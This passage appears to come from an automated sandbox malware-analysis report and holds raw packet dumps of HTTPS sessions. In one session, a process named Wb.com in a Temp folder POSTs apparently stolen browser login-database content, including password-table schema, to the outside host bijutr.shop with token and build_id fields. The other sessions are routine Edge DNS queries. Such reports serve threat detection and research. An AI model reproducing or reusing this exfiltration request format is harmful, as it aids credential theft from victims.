                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC1390INData Raw: ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2 bb
                                                                                                                                                                                                                                                                                                      Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC1390INData Raw: 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44 bd
                                                                                                                                                                                                                                                                                                      Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC1390INData Raw: 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb 4c
                                                                                                                                                                                                                                                                                                      Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGWL
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC1390INData Raw: bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd bf
                                                                                                                                                                                                                                                                                                      Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC1390INData Raw: 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83 30
                                                                                                                                                                                                                                                                                                      Data Ascii: =+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v0
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC1390INData Raw: 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82 fa
                                                                                                                                                                                                                                                                                                      Data Ascii: K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC1390INData Raw: c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89 0f
                                                                                                                                                                                                                                                                                                      Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC1390INData Raw: d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05 8f
                                                                                                                                                                                                                                                                                                      Data Ascii: aW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC1390INData Raw: 13 fa f8 51 4e 97 0f d5 84 e9 74 fa 59 da 7c bf e3 19 63 e7 07 e3 a7 9c f0 cd e3 fc 08 b5 3a ce 6e 1e 74 71 58 2e 86 7b e3 3e 33 82 51 35 c1 d9 f3 e4 51 51 26 64 2c af 85 36 8b 9c 7b 7a b0 77 c8 75 fa 03 ca fd a0 c3 ce 9a 6e be f5 7a 7b 67 77 ef cd db fd 77 ef 0f 0e 8f 8e 3f 7c 3c 39 fd f4 f9 cb d7 6f df 7f 30 cf 87 a1 c4 49 7a 7e 91 75 7b fd c1 af e1 68 3c b9 bc ba be f9 5d 6f ac 3d 5b 7f fe e2 ef 97 af f2 63 f2 15 f4 d6 9e 55 aa 4f dd 8a 03 ff c2 3f ab 3f 5d fa b7 46 ff 56 3a 94 2b 20 dc 78 de 0a 95 8b c3 47 91 c8 67 63 2b 40 91 24 6f ca 6e 7d 87 bd d2 71 e7 b6 91 dc ac b1 6c 22 71 23 d8 4d ad 1f 0c cf f9 69 73 e6 2f 50 b6 99 79 ee 77 4a 8a 21 24 4f 4b 33 1e c8 1d fb f4 19 74 19 80 e6 f6 62 bd 83 59 19 a8 db d0 e5 f1 d2 79 f6 89 b5 56 54 75 9f c9 63 20
                                                                                                                                                                                                                                                                                                      Data Ascii: QNtY|c:ntqX.{>3Q5QQ&d,6{zwunz{gww?|<9o0Iz~u{h<]o=[cUO??]FV:+ xGgc+@$on}ql"q#Mis/PywJ!$OK3tbYyVTuc


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      29192.168.2.649927188.245.216.2054432744C:\Users\user\AppData\Local\Temp\623615\Wb.com
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC325OUTPOST / HTTP/1.1
                                                                                                                                                                                                                                                                                                      Content-Type: multipart/form-data; boundary=----HVAI58YMYMYU379R9HDB
                                                                                                                                                                                                                                                                                                      User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/128.0.0.0 Safari/537.36 OPR/116.0.0.0
                                                                                                                                                                                                                                                                                                      Host: bijutr.shop
                                                                                                                                                                                                                                                                                                      Content-Length: 68733
                                                                                                                                                                                                                                                                                                      Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                      Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC16355OUTData Raw: 2d 2d 2d 2d 2d 2d 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 61 36 65 32 32 65 66 39 63 35 37 35 34 65 63 66 38 32 31 31 39 33 36 65 64 31 33 62 64 38 37 30 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 42 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 63 31 34 30 30 66 31 31 35 31 33 31 65 31 66 61 38 34 65 61 39 38 35 39 39 64 35 33 64 30 62 64 0d 0a 2d 2d 2d 2d 2d 2d 48 56 41 49 35 38 59 4d 59 4d 59 55 33 37 39 52 39 48 44 42 0d 0a 43 6f 6e 74
                                                                                                                                                                                                                                                                                                      Data Ascii: ------HVAI58YMYMYU379R9HDBContent-Disposition: form-data; name="token"a6e22ef9c5754ecf8211936ed13bd870------HVAI58YMYMYU379R9HDBContent-Disposition: form-data; name="build_id"c1400f115131e1fa84ea98599d53d0bd------HVAI58YMYMYU379R9HDBCont
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC16355OUTData Raw: 32 68 68 63 6d 6c 75 5a 31 39 75 62 33 52 70 5a 6d 6c 6a 59 58 52 70 62 32 35 66 5a 47 6c 7a 63 47 78 68 65 57 56 6b 49 45 6c 4f 56 45 56 48 52 56 49 67 54 6b 39 55 49 45 35 56 54 45 77 67 52 45 56 47 51 56 56 4d 56 43 41 77 4c 43 42 72 5a 58 6c 6a 61 47 46 70 62 6c 39 70 5a 47 56 75 64 47 6c 6d 61 57 56 79 49 45 4a 4d 54 30 49 73 49 46 56 4f 53 56 46 56 52 53 41 6f 62 33 4a 70 5a 32 6c 75 58 33 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 5a 57 78 6c 62 57 56 75 64 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 56 66 64 6d 46 73 64 57 55 73 49 48 42 68 63 33 4e 33 62 33 4a 6b 58 32 56 73 5a 57 31 6c 62 6e 51 73 49 48 4e 70 5a 32 35 76 62 6c 39 79 5a 57 46 73 62 53 6b 70 4b 77 51 47 46 7a 38 5a 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68
                                                                                                                                                                                                                                                                                                      Data Ascii: 2hhcmluZ19ub3RpZmljYXRpb25fZGlzcGxheWVkIElOVEVHRVIgTk9UIE5VTEwgREVGQVVMVCAwLCBrZXljaGFpbl9pZGVudGlmaWVyIEJMT0IsIFVOSVFVRSAob3JpZ2luX3VybCwgdXNlcm5hbWVfZWxlbWVudCwgdXNlcm5hbWVfdmFsdWUsIHBhc3N3b3JkX2VsZW1lbnQsIHNpZ25vbl9yZWFsbSkpKwQGFz8ZAQBpbmRleHNxbGl0ZV9h
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC16355OUTData Raw: 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
                                                                                                                                                                                                                                                                                                      Data Ascii: AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:05 UTC3313OUTData Raw: 6b 5a 58 68 69 63 6d 56 68 59 32 68 6c 5a 42 52 44 55 6b 56 42 56 45 55 67 53 55 35 45 52 56 67 67 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 64 47 46 69 62 47 56 66 61 57 35 6b 5a 58 67 67 54 30 34 67 59 6e 4a 6c 59 57 4e 6f 5a 57 51 67 4b 48 56 79 62 43 77 67 64 58 4e 6c 63 6d 35 68 62 57 55 70 4c 78 41 47 46 30 4d 64 41 51 42 70 62 6d 52 6c 65 48 4e 78 62 47 6c 30 5a 56 39 68 64 58 52 76 61 57 35 6b 5a 58 68 66 59 6e 4a 6c 59 57 4e 6f 5a 57 52 66 4d 57 4a 79 5a 57 46 6a 61 47 56 6b 45 34 49 66 44 77 63 58 48 52 30 42 68 42 46 30 59 57 4a 73 5a 57 4a 79 5a 57 46 6a 61 47 56 6b 59 6e 4a 6c 59 57 4e 6f 5a 57 51 53 51 31 4a 46 51 56 52 46 49 46 52 42 51 6b 78 46 49 47 4a 79 5a 57 46 6a 61 47 56 6b 49 43 68 31 63 6d 77 67 56 6b 46 53 51 30 68 42 55 69 42 4f 54 31
                                                                                                                                                                                                                                                                                                      Data Ascii: kZXhicmVhY2hlZBRDUkVBVEUgSU5ERVggYnJlYWNoZWRfdGFibGVfaW5kZXggT04gYnJlYWNoZWQgKHVybCwgdXNlcm5hbWUpLxAGF0MdAQBpbmRleHNxbGl0ZV9hdXRvaW5kZXhfYnJlYWNoZWRfMWJyZWFjaGVkE4IfDwcXHR0BhBF0YWJsZWJyZWFjaGVkYnJlYWNoZWQSQ1JFQVRFIFRBQkxFIGJyZWFjaGVkICh1cmwgVkFSQ0hBUiBOT1
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC158INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: nginx
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:07 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                      Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:07 UTC12INData Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                                                                      Data Ascii: 2ok0


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      30192.168.2.649929172.64.41.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
                                                                                                                                                                                                                                                                                                      CF-RAY: 8f69a60098a71851-EWR
                                                                                                                                                                                                                                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC468INData Raw: 00 00 81 80 00 01 00 01 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 c0 0c 00 01 00 01 00 00 01 2b 00 04 8e fb 23 a3 00 00 29 04 d0 00 00 00 00 01 98 00 0c 01 94 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom+#)


                                                                                                                                                                                                                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                      31192.168.2.649930162.159.61.34437132C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                                                      TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC245OUTPOST /dns-query HTTP/1.1
                                                                                                                                                                                                                                                                                                      Host: chrome.cloudflare-dns.com
                                                                                                                                                                                                                                                                                                      Connection: keep-alive
                                                                                                                                                                                                                                                                                                      Content-Length: 128
                                                                                                                                                                                                                                                                                                      Accept: application/dns-message
                                                                                                                                                                                                                                                                                                      Accept-Language: *
                                                                                                                                                                                                                                                                                                      User-Agent: Chrome
                                                                                                                                                                                                                                                                                                      Accept-Encoding: identity
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC128OUTData Raw: 00 00 01 00 00 01 00 00 00 00 00 01 03 77 77 77 07 67 73 74 61 74 69 63 03 63 6f 6d 00 00 01 00 01 00 00 29 10 00 00 00 00 00 00 54 00 0c 00 50 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                                                                      Data Ascii: wwwgstaticcom)TP
                                                                                                                                                                                                                                                                                                      2024-12-23 16:15:06 UTC247INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                      Server: cloudflare
                                                                                                                                                                                                                                                                                                      Date: Mon, 23 Dec 2024 16:15:06 GMT
                                                                                                                                                                                                                                                                                                      Content-Type: application/dns-message
                                                                                                                                                                                                                                                                                                      Connection: close
                                                                                                                                                                                                                                                                                                      Access-Control-Allow-Origin: *
                                                                                                                                                                                                                                                                                                      Content-Length: 468
